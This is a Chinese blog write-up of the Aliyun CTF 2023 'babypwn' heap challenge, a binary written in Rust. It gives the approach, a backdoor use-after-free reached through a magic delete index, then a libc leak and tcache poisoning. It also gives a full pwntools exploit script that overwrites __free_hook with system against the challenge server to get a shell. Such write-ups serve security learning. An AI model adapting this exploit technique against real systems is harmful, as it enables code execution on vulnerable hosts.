阿里云CTF2023-babypwn-WP

一道rust写的堆题

Posted by l0tus on 2023-04-26
Estimated Reading Time 2 Minutes
Words 456 In Total
Viewed Times

rust 写的目录堆题
很丑。
主函数:



是我做过最丑的pwn题,主函数无视掉一部分很丑陋的代码。主要关注的就是一个switch case 语句,左边的函数栏中仔细看可以看到增删查改和目录还有后门

backdoor函数:

delete函数:


源码我就不解读了太丑了没仔细看,大概试试也就能测出洞来
思路:
delete函数调用时输入index为1953723762可以调用后门函数实现uaf
后续就是泄露libc基址->tcache poison
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
#!/usr/bin/python3
# -*- encoding: utf-8 -*-

from pwn import *
from hashlib import sha256
from pwnlib.util.iters import count

context.log_level = "debug"
context.arch = "amd64"

# p = process("./babyheap")

elf = ELF("./babyheap")
libc = ELF("./libc-2.27.so")

def add(size, content):
p.sendlineafter(b">>> ", b"1")
p.sendlineafter(b"idx is ", str(size).encode())
p.sendafter(b"next the content: ", content)

def show(idx):
p.sendlineafter(b">>> ", b"2")
p.sendlineafter(b"house index: ", str(idx).encode())

def edit(idx, content):
p.sendlineafter(b">>> ", "3")
p.sendlineafter(b"house index: ", str(idx).encode())
p.sendafter(b"content(size 8): ", content)

def delete(idx):
p.sendlineafter(b">>> ", b"4")
p.sendlineafter(b"house index: ", str(idx).encode())

p = remote("47.98.229.103", "1337")
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)
add(0x1F0, b"a" * 0x1F0)

delete(1)
delete(2)
delete(3)
delete(4)
delete(5)
delete(6)
delete(7)

delete(1953723762) # delete 0

show(0)

libc_base = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x3ebca0
log.info("libc_base: " + hex(libc_base))

add(0x8, b"b" * 0x8)

delete(1953723762) # delete 1

edit(1, p64(libc_base + libc.sym["__free_hook"]))

add(0x8, b"/bin/sh\x00")

# gdb.attach(p)

add(0x8, p64(libc_base + libc.sym["system"]))

delete(2)


p.interactive()

如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !